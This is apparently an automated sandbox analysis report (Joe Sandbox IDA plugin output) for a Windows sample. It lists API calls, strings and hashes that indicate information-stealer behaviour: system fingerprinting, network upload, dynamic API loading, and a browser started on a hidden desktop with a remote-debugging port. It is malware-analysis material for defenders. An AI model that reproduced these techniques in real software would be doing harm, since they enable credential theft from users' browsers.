Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
Instruction ID: 014b429b1741e436801b15e8bd7966bb0b54650bd2b29401a92df51bb3a02755
Opcode Fuzzy Hash: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
Instruction Fuzzy Hash: AE01ED71D00218AFDB14DFA9EC45B9EBBB9EB48364F00412AF954E7390DB7459058FD4

Function 004228B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
HeapAlloc.KERNEL32(00000000), ref: 004228CC
RegOpenKeyExA.KERNEL32(80000002,00919720,00000000,00020119,00422849), ref: 004228EB
RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
RegCloseKey.ADVAPI32(00422849), ref: 0042290F

Strings

CurrentBuildNumber, xrefs: 004228FF

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction ID: 511d72b61889e888fce99ae4c6434b8b9b60ca6e34e130828c21c0af2f9d307b
Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction Fuzzy Hash: A401B1B5600318BFD314CBA0AC59EEB7BBDEB48741F100059FE45D7251EAB059488BE0

Function 00422820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422835
HeapAlloc.KERNEL32(00000000), ref: 0042283C

Part of subcall function 004228B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
Part of subcall function 004228B0: HeapAlloc.KERNEL32(00000000), ref: 004228CC
Part of subcall function 004228B0: RegOpenKeyExA.KERNEL32(80000002,00919720,00000000,00020119,00422849), ref: 004228EB
Part of subcall function 004228B0: RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
Part of subcall function 004228B0: RegCloseKey.ADVAPI32(00422849), ref: 0042290F

RegOpenKeyExA.KERNEL32(80000002,00919720,00000000,00020119,?), ref: 00422871
RegQueryValueExA.KERNEL32(?,00925460,00000000,00000000,00000000,000000FF), ref: 0042288C
RegCloseKey.ADVAPI32(?), ref: 00422896

Strings

Windows 11, xrefs: 00422850

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction ID: 245893ec578ba7a3a6616ac8632bceecdb141f16bd8db204d0021f9794345961
Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction Fuzzy Hash: 4B01AD71A00319BFDB14ABA4AD89EEA777EEB44315F004159FE09D3290EAB499448BE4

Function 0041EFE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041F013
StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,0041F54D), ref: 0041F02E
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F08F

Strings

ERROR, xrefs: 0041F028, 0041F089

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: ERROR
API String ID: 3722407311-2861137601
Opcode ID: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
Instruction ID: 69ff5e85aab99745ebf021dc766ac19dec4547d6b77a9f3117695369316efa97
Opcode Fuzzy Hash: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
Instruction Fuzzy Hash: 2E2103717106065FCB24BF7ACD4979B37A4AF04308F40453AB849EB2E2DA79D8568798

Function 00422A70 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00422A9F
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00422AA6
GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422ABA

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
Instruction ID: efc61c24513596c7619485b0df79f857d3f5556d4fab8db62f2f2c2678d554aa
Opcode Fuzzy Hash: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
Instruction Fuzzy Hash: 4C01A272B44618ABD714DF99ED45B9AB7A8F748B21F00026BE915D3780D7B859008AE1

Function 008D742D Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008D7455
Module32First.KERNEL32(00000000,00000224), ref: 008D7475

Memory Dump Source

Source File: 00000002.00000002.2358488571.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_B5F8.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: b6766557dd383e737cd6dd26174f7d55c2d92a5a555b434041320756b40feae0
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 26F062315007146BDB212AB9A88DAAE7BEDFF49725F10062AE642D12C0EA70EC454A65

Function 021A0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,021A0223,?,?), ref: 021A0E19
SetErrorMode.KERNEL32(00000000,?,?,021A0223,?,?), ref: 021A0E1E

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 0fac829cb6e61de93fca2677155de0d3955556339b50236b110e9951cdebb01d
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 54D0123514512877DB002A94DC09BCD7B1CDF09B66F108011FB0DD9080C770954046E5

Function 0041EF30 Relevance: 1.3, APIs: 1, Instructions: 50stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041EF62

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
Instruction ID: d5213ce56d19ccab4b54554078f0f9591c11fd9792c964766793415fd4e25809
Opcode Fuzzy Hash: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
Instruction Fuzzy Hash: 3211E5B07201459BCB24FF7ADD4AADF37A4AF44304F404139BC88AB2E2DA78ED458795

Function 008D70EC Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008D713D

Memory Dump Source

Source File: 00000002.00000002.2358488571.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_B5F8.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: d572c43fb6a334648e2b9ea009b6c2a6ac682873ec274f409dee5391ac4a24f6
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 81113C79A00208EFDB01DF98C985E98BBF5EF08750F058195F9489B362D771EA50EF80

Non-executed Functions

Function 021B7047 Relevance: 147.8, APIs: 83, Strings: 1, Instructions: 752stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B707C
SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 021B70AF
lstrcpy.KERNEL32(00000000,00000000), ref: 021B70E9
lstrcpy.KERNEL32(00000000,00000000), ref: 021B7110
lstrcat.KERNEL32(00000000,00000000), ref: 021B711B
lstrcpy.KERNEL32(00000000,00000000), ref: 021B7144
lstrlen.KERNEL32(00435320), ref: 021B715E
lstrcpy.KERNEL32(00000000,00000000), ref: 021B7180
lstrcat.KERNEL32(00000000,00435320), ref: 021B718C
lstrcpy.KERNEL32(00000000,00000000), ref: 021B71B7
lstrcpy.KERNEL32(00000000,00000000), ref: 021B71E7
LocalAlloc.KERNEL32(00000040,?), ref: 021B721C
strtok_s.MSVCRT ref: 021B7249
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B7284
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B72B4

Strings

hSC, xrefs: 021B7651, 021B7654, 021B76CD

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlenstrtok_s
String ID: hSC
API String ID: 922491270-3351665975
Opcode ID: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
Instruction ID: 9038c09de30d447d0f7743e4123faabe2f03589c047561664ad032b841cdabb0
Opcode Fuzzy Hash: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
Instruction Fuzzy Hash: 8E42B575E412059FDB22AF74CC88BAEBBB6AF84705F145418F805E7290DB74D902DFA0

Function 021A6267 Relevance: 128.6, APIs: 68, Strings: 5, Instructions: 817stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 021A6296
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021A62E9
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021A631C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021A634C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021A6387
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021A63BA
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 021A63CA

Strings

TPC, xrefs: 021A6868
------, xrefs: 021A64F0, 021A651D, 021A6795, 021A6886
", xrefs: 021A682E, 021A691C
TPC, xrefs: 021A68C0
TPC, xrefs: 021A67D2

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------$TPC$TPC$TPC
API String ID: 2041821634-3953685780
Opcode ID: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
Instruction ID: 985566888ae9824c6bb4c6bcca09dc3d11186bf18b4a83420fec3d0d072a5053
Opcode Fuzzy Hash: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
Instruction Fuzzy Hash: BD525175A412559FDF20EFB4DC98AAE77BAAF44309F184428E805EB650DB74DC06CFA0

Function 021B7260 Relevance: 114.3, APIs: 64, Strings: 1, Instructions: 526stringmemoryencryptionCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B7284
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B72B4
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B72E4
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B7316
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 021B7323
RtlAllocateHeap.NTDLL(00000000), ref: 021B732A
StrStrA.SHLWAPI(00000000,00435350), ref: 021B7341
lstrlen.KERNEL32(00000000), ref: 021B734C
malloc.MSVCRT ref: 021B7356
strncpy.MSVCRT ref: 021B7364
lstrcpy.KERNEL32(00000000,00000000), ref: 021B738F
lstrcpy.KERNEL32(00000000,00000000), ref: 021B73B6
StrStrA.SHLWAPI(00000000,00435358), ref: 021B73C9
lstrlen.KERNEL32(00000000), ref: 021B73D4
malloc.MSVCRT ref: 021B73DE
strncpy.MSVCRT ref: 021B73EC
lstrcpy.KERNEL32(00000000,00000000), ref: 021B7417
lstrcpy.KERNEL32(00000000,00000000), ref: 021B743E
StrStrA.SHLWAPI(00000000,00435360), ref: 021B7451
lstrlen.KERNEL32(00000000), ref: 021B745C
malloc.MSVCRT ref: 021B7466
strncpy.MSVCRT ref: 021B7474
lstrcpy.KERNEL32(00000000,00000000), ref: 021B749F
lstrcpy.KERNEL32(00000000,00000000), ref: 021B74C6
StrStrA.SHLWAPI(00000000,00435368), ref: 021B74D9
lstrlen.KERNEL32(00000000), ref: 021B74E8
malloc.MSVCRT ref: 021B74F2
strncpy.MSVCRT ref: 021B7500
lstrcpy.KERNEL32(00000000,00000000), ref: 021B7530
lstrcpy.KERNEL32(00000000,00000000), ref: 021B7558
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 021B757B
LocalAlloc.KERNEL32(00000040,00000000), ref: 021B758F
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 021B75B0
LocalFree.KERNEL32(00000000), ref: 021B75BB
lstrlen.KERNEL32(?), ref: 021B7655
lstrlen.KERNEL32(?), ref: 021B7668
lstrlen.KERNEL32(?), ref: 021B767B

Strings

hSC, xrefs: 021B7651, 021B7654, 021B76CD

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$mallocstrncpy$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
String ID: hSC
API String ID: 2413810636-3351665975
Opcode ID: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
Instruction ID: 0f25e7873f36594ead8307742c1906f983371d6d5bda8c5a5f89841c58cd55a8
Opcode Fuzzy Hash: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
Instruction Fuzzy Hash: 9302D375A81215AFDB21AF74DC88FAEBBB6AF48305F145418F801E7290DB74C902DFA0

Function 021C6627 Relevance: 48.2, APIs: 32, Instructions: 218libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 021C6680
GetProcAddress.KERNEL32(006390E0,00638E44), ref: 021C6699
GetProcAddress.KERNEL32(006390E0,00638A64), ref: 021C66B1
GetProcAddress.KERNEL32(006390E0,00638A50), ref: 021C66C9
GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 021C66E2
GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 021C66FA
GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 021C6712
GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 021C672B
GetProcAddress.KERNEL32(006390E0,00638D48), ref: 021C6743
GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 021C675B
GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 021C6774
GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 021C678C
GetProcAddress.KERNEL32(006390E0,006388B0), ref: 021C67A4
GetProcAddress.KERNEL32(006390E0,00638D98), ref: 021C67BD
GetProcAddress.KERNEL32(006390E0,00638A24), ref: 021C67D5
GetProcAddress.KERNEL32(006390E0,00638C18), ref: 021C67ED
GetProcAddress.KERNEL32(006390E0,00638E34), ref: 021C6806
GetProcAddress.KERNEL32(006390E0,006388BC), ref: 021C681E
GetProcAddress.KERNEL32(006390E0,0063892C), ref: 021C6836
GetProcAddress.KERNEL32(006390E0,00638AB0), ref: 021C684F
LoadLibraryA.KERNEL32(00638D50,?,?,?,021C1E4A), ref: 021C6860
LoadLibraryA.KERNEL32(0063897C,?,?,?,021C1E4A), ref: 021C6872
LoadLibraryA.KERNEL32(00638904,?,?,?,021C1E4A), ref: 021C6884
LoadLibraryA.KERNEL32(006389DC,?,?,?,021C1E4A), ref: 021C6895
LoadLibraryA.KERNEL32(00638B28,?,?,?,021C1E4A), ref: 021C68A7
GetProcAddress.KERNEL32(00638EF8,00638CAC), ref: 021C68C4
GetProcAddress.KERNEL32(00639020,00638C24), ref: 021C68E0
GetProcAddress.KERNEL32(00639020,006389CC), ref: 021C68F8
GetProcAddress.KERNEL32(00639114,00638B94), ref: 021C6914
GetProcAddress.KERNEL32(00638FD4,00638928), ref: 021C6930
GetProcAddress.KERNEL32(00639004,00638C14), ref: 021C694C
GetProcAddress.KERNEL32(00639004,00435864), ref: 021C6963

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction ID: 2cbec094ff6ce26518f54e18025b110079975547b8e1151c61f8ab72fe1a7e63
Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction Fuzzy Hash: F9A16DB9A117009FD758DF65EE88A6637BBF789344300A51DF94683364DBB4A900DFB0

Function 004097A0 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 235stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004097C4
lstrcatA.KERNEL32(?,?), ref: 004097D8
lstrcatA.KERNEL32(?,?), ref: 004097ED
lstrcatA.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00409800
memset.MSVCRT ref: 00409815

Part of subcall function 00423E10: lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
Part of subcall function 00423E10: lstrcpy.KERNEL32(00000000,00919518), ref: 00423E6F
Part of subcall function 00423E10: GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79

wsprintfA.USER32 ref: 00409846
OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409869
CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409888
memset.MSVCRT ref: 004098A6
lstrcatA.KERNEL32(?,?,?,00000000,00000103), ref: 004098BB
lstrcatA.KERNEL32(?,?), ref: 004098CD
lstrcatA.KERNEL32(?,00435128), ref: 004098DD
memset.MSVCRT ref: 004098F2
